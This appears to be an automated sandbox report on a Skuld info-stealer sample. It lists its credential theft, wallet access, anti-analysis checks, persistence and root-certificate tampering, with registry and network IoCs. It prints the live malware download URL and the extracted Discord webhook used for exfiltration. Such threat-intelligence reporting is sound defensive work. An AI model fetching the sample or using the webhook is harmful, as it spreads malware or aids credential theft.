skuld | hxxps://cdn[.]discordapp[.]com/attachments/1279538248812728444/1279554286606356606/protected[.]exe?ex=66de17ca&is=66dcc64a&hm=43250b2cd503619bdfc07222d9499ec7477897d59a519ea19ce0c71f0ab6bf0a&

Analysis

max time kernel
780s
max time network
727s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
07-09-2024 22:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://cdn.discordapp.com/attachments/1279538248812728444/1279554286606356606/protected.exe?ex=66de17ca&is=66dcc64a&hm=43250b2cd503619bdfc07222d9499ec7477897d59a519ea19ce0c71f0ab6bf0a&

Score

10^/10

skuld credential_access defense_evasion discovery evasion execution persistence privilege_escalation spyware stealer trojan

Malware Config

Extracted

Family

skuld

https://discord.com/api/webhooks/1279552508578238534/-lGdkw-tDuy6Wd-I7APMhPnY3Tp2Oh3ZxzkvZFiG36eu6-pHpBKf4a2y4W0ZpaNYzcmk

Signatures

Skuld stealer
An info stealer written in Go lang.
stealer skuld
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	_protected.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
5668	powershell.exe
5444	powershell.exe

Downloads MZ/PE file

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	_protected.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	_protected.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	_protected.exe

Executes dropped EXE 1 IoCs

pid	Process
1568	_protected.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Protect\\SecurityHealthSystray.exe"	_protected.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	_protected.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
56	discord.com
57	discord.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
51	ip-api.com
49	api.ipify.org
50	api.ipify.org

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	_protected.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	_protected.exe

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
1568	_protected.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 1 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
5864	netsh.exe

Detects videocard installed 1 TTPs 2 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
5332	wmic.exe
5612	wmic.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

GoLang User-Agent 1 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	52	Go-http-client/1.1

Modifies system certificate store 2 TTPs 9 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C	_protected.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0400000001000000100000003e455215095192e1b75d379fb187298a0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c99140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b9992367f000000010000000c000000300a06082b060105050703097a000000010000000c000000300a06082b060105050703097e00000001000000080000000000042beb77d501030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c190000000100000010000000a823b4a20180beb460cab955c24d7e21200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	_protected.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474	_protected.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	_protected.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	_protected.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	_protected.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 5c000000010000000400000000080000190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c7e00000001000000080000000000042beb77d5017a000000010000000c000000300a06082b060105050703097f000000010000000c000000300a06082b060105050703091d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c990b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b060105050703080f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d0400000001000000100000003e455215095192e1b75d379fb187298a200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	_protected.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e40f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f53000000010000007f000000307d3020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c009000000010000003e000000303c06082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030906082b0601050507030106082b060105050703080b0000000100000030000000440069006700690043006500720074002000420061006c00740069006d006f0072006500200052006f006f007400000062000000010000002000000016af57a9f676b0ab126095aa5ebadef22ab31119d644ac95cd4b93dbf3f26aeb140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c7f000000010000000c000000300a06082b060105050703097e000000010000000800000000c001b39667d601030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47419000000010000001000000068cb42b035ea773e52ef50ecf50ec52920000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	_protected.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 5c00000001000000040000000008000019000000010000001000000068cb42b035ea773e52ef50ecf50ec529030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae4747e000000010000000800000000c001b39667d6017f000000010000000c000000300a06082b060105050703091d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df062000000010000002000000016af57a9f676b0ab126095aa5ebadef22ab31119d644ac95cd4b93dbf3f26aeb0b0000000100000030000000440069006700690043006500720074002000420061006c00740069006d006f0072006500200052006f006f007400000009000000010000003e000000303c06082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030906082b0601050507030106082b0601050507030853000000010000007f000000307d3020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f040000000100000010000000acb694a59c17e0d791529bb19706a6e420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	_protected.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 364754.crdownload:SmartScreen	msedge.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4440	msedge.exe
4440	msedge.exe
4436	msedge.exe
4436	msedge.exe
1272	identity_helper.exe
1272	identity_helper.exe
3368	msedge.exe
3368	msedge.exe
1568	_protected.exe
1568	_protected.exe
1568	_protected.exe
1568	_protected.exe
1568	_protected.exe
1568	_protected.exe
1568	_protected.exe
1568	_protected.exe
1568	_protected.exe
1568	_protected.exe
5444	powershell.exe
5444	powershell.exe
5444	powershell.exe
1568	_protected.exe
1568	_protected.exe
1568	_protected.exe
1568	_protected.exe
1568	_protected.exe
1568	_protected.exe
1568	_protected.exe
1568	_protected.exe
5668	powershell.exe
5668	powershell.exe
5668	powershell.exe
1568	_protected.exe
1568	_protected.exe
1568	_protected.exe
1568	_protected.exe
1568	_protected.exe
1568	_protected.exe
1568	_protected.exe
1568	_protected.exe
1568	_protected.exe
1568	_protected.exe
1568	_protected.exe
1568	_protected.exe
1568	_protected.exe
1568	_protected.exe
1568	_protected.exe
1568	_protected.exe
1568	_protected.exe
1568	_protected.exe
1568	_protected.exe
1568	_protected.exe
1568	_protected.exe
1568	_protected.exe
1568	_protected.exe
1568	_protected.exe
1568	_protected.exe
1568	_protected.exe
1568	_protected.exe
1568	_protected.exe
1568	_protected.exe
1568	_protected.exe
1568	_protected.exe
1568	_protected.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

pid	Process
4436	msedge.exe
4436	msedge.exe
4436	msedge.exe
4436	msedge.exe
4436	msedge.exe
4436	msedge.exe
4436	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1568	_protected.exe
Token: SeIncreaseQuotaPrivilege	5296	wmic.exe
Token: SeSecurityPrivilege	5296	wmic.exe
Token: SeTakeOwnershipPrivilege	5296	wmic.exe
Token: SeLoadDriverPrivilege	5296	wmic.exe
Token: SeSystemProfilePrivilege	5296	wmic.exe
Token: SeSystemtimePrivilege	5296	wmic.exe
Token: SeProfSingleProcessPrivilege	5296	wmic.exe
Token: SeIncBasePriorityPrivilege	5296	wmic.exe
Token: SeCreatePagefilePrivilege	5296	wmic.exe
Token: SeBackupPrivilege	5296	wmic.exe
Token: SeRestorePrivilege	5296	wmic.exe
